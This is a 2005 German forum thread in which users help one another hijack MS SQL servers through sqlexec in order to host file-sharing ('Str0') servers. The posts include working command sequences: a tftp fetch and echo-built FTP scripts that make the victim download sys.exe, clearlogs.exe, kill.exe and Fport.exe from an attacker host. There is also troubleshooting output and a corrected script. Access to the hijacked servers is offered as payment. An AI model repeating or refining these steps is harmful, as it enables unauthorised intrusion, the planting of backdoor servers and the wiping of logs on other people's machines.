Str0 hacken problem bei sqlexeq

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Sypherxtc, 22. Juni 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 22. Juni 2005
    Hi
    ich versuche mich grad am Str0 hacken aber hab ein problem und zwar wenn ich die daten auf den server scheiben will via "tftp.exe Deine IP get clearlogs.exe c:clearlogs.exe" befehl hängt sich sqlexec auf bzw reagiert net mehr! soll ich bei "Deine IP" meine ip (zb. xx.173.xx.x5) oder 127.0.0.1 eingeben? Wenn ich meine IP eingebe hängt er sich auf jeden fall mal auf! Woran kann das liegen?

    wer mir hilft bekommt einen Leecher account!


    Gruss Sypher
     
  3. 22. Juni 2005
    andere frage..wieso machst du es über tftp...gibt schließlich andere wege und "sichere"

    greetz
     
  4. 22. Juni 2005
    tftp is sehr unsicher

    machs lieber über die ECHO-Methode

    Serv-U hängt sich nicht auf, es sieht nur so aus

    Jetz hab ich dir geholfen und will einen leecher account
     
  5. 22. Juni 2005
    weil wenn ich es über die pub variante mache und folgenden befehl eingeb "echo open PUBIP>>c:\ftpscr.txt" kommt in sqlexec "SQL_NO_DATA"
    oder is das normal?
    Wenn ich es ohne ">>c:\ftpscr.txt" mache dann geht es zwar aber dann is doch bestimmt was falsch oder?

    Gruss Sypher
     
  6. 22. Juni 2005
    liegt an der DB, auch wenn die meldung SQL_NO_DATA kommt, gehts in den meisten fällen...
     
  7. 22. Juni 2005
    ok habs nun mit der echo methode gemacht dann bekomm ich aber folgendes prob:

    ich mache meine meine txt:

    echo open xxx>>c:\2.txt
    echo anonymous>>c:\2.txt
    echo anonymous@lol.com>>c:\2.txt
    echo BINARY>>c:\2.txt
    echo get sys.exe>>c:\2.txt
    echo get sys.ini>>c:\2.txt
    echo get clearlogs.exe>>c:\2.txt
    echo get kill.exe>>c:\2.txt
    echo get Fport.exe>>c:\2.txt
    echo quit>>c:\2.txt

    dann starte ich sie und bekomm folgenden fehler:

    Connected to xxx

    open xxxx
    220 Y2003 Microsoft FTP Service (Version 5.0).
    Invalid command.

    Invalid command.

    anonymous
    anonymous@lol.com
    BINARY
    530 Please login with USER and PASS.

    get sys.exe
    200 PORT command successful.
    530 Please login with USER and PASS.

    get sys.ini
    200 PORT command successful.
    530 Please login with USER and PASS.

    get clearlogs.exe
    200 PORT command successful.
    530 Please login with USER and PASS.

    get kill.exe
    200 PORT command successful.
    530 Please login with USER and PASS.

    get Fport.exe
    200 PORT command successful.
    530 Please login with USER and PASS.

    quit
    221





    Gruss Sypher
     
  8. 23. Juni 2005
    Für mich sieht das fast so aus, wie wenn beteits ein Ftp-Server auf port 21 lauscht, und du dich somit garnicht bei deinem Serv-U einloggst.

    Tipp: Versuch mal nicht port 21 zu verwenden, sondern irgend ein anderer bei der Configuration angeben.

    und dann halt: open [ip] [port], da open [ip] standartmäßig den Port 21 verwendet.
     
  9. 23. Juni 2005
    der user w muss in eine zeile geschrieben werden, das geht so:
    echo open anonymous web@lol.com >>C:\2.txt
     
  10. 23. Juni 2005
    GENAU!!!!
    Ausserdem wenn du tftp machst muss er die file ja von dir saugen,und das dauert seine Zeit,überlege du hast 16 kb/s upload die file is 2mb groß->das kann schon 5-10 mins dauern!!!
     
  11. 26. Juni 2005
    ich habe das gleiche problem...

    und wenn ich user w in die gleiche zeile schreib klappt es immernoch net

    weiß sonst vllt noch jemand was ich vllt. falsch mache?
     
  12. 26. Juni 2005
    wie ist die fehlermeldung?
    vll. ist ja der pub off, wo das zeug drauf liegt...

    oder mach ma type c:\[path zur datei.txt]
    und sag was da steht
     
  13. 26. Juni 2005
    echo open *.*.*.* >> c:\blabla.txt
    echo user anonymous anonymous@isp.com >> c:\blabla.txt
    echo / >> c:\blabla.txt
    echo get blabla.exe >> c:\blabla.txt
    echo get blabla.txt >> c:\blabla.txt
    echo get blabla.ini >> c:\blabla.txt
    echo get fport.exe >> c:\blabla.txt
    echo get kill.exe >> c:\blabla.txt
    echo quit >> c:\blabla.txt

    So muss das aussehen, wenn irgentwas nich geht liegts am MsSQL-Server. Die These mit dem Pub der 2 Minuten nachdem er sein Kram drauf geullert hat down geht ist mehr als dürftig.

    Und @sypherxtc... Hör auf andauernt Accs zu deinen nicht vorhandenen Stros zu versprechen... Selbst wenn du es schaffst Serv-U zum laufen zu bekommen ist es unwahrscheinlich dass der Speed ausreichend ist und der Stro bei deinem Können länger als n Tag hält.

    Klingt komisch, is aber so.=)
     
  14. Video Script

    Videos zum Thema